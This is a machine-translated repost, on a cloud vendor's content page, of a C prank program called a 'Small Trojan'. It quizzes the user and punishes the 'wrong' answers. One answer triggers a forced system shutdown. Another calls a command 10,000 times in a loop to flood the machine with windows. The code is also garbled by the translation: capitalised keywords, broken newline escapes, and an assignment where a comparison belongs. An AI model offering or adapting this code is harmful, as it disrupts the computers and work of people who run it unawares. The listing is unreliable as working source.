Small Trojan program

Source: Internet
Author: User

# Include <stdio. h>
# Include <windows. h>
# Include <conio. h>
# Include <malloc. h>

Int main (void)
{
Int N, P = 3, I;
Printf ("is peng Wenzhong very handsome? /N ");
Printf ("option: 1. Yes, very handsome 2. Okay, no handsome 3. Fuck Sb/N ");
Printf ("select :");
 
While (p --)
{
Scanf ("% d", & N );

Switch (N)
{
Case 1: printf ("you are an honest child! /N ");
Break;
Case 2:
Printf ("not honest, I'll give you some punishment (test), cool! /N ");
Printf ("If not, send me a text message! /N ");
System ("shutdown-s-t 60"); break;
Case 3:
Printf ("prepare to restart! /N ");
For (I = 0; I <10000; I ++)
System ("START ");
Break;

Case 4:
Printf ("good guy! Savior! PS: You just need to know. Why do you say it? Hey, hey! /N ");
System ("shutdown-");
Break;
}
If (P = 0)
Printf ("it means you have not been knocked down by curiosity or saved in the middle. Congratulations! /N ");
Else
Printf ("Select again :");
}
Getch ();
Return 0;
}

/* Is it very simple, but the effect is also very obvious. Haha, it is for entertainment only and helps increase your interest in VC programming. Be careful when using it. */

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.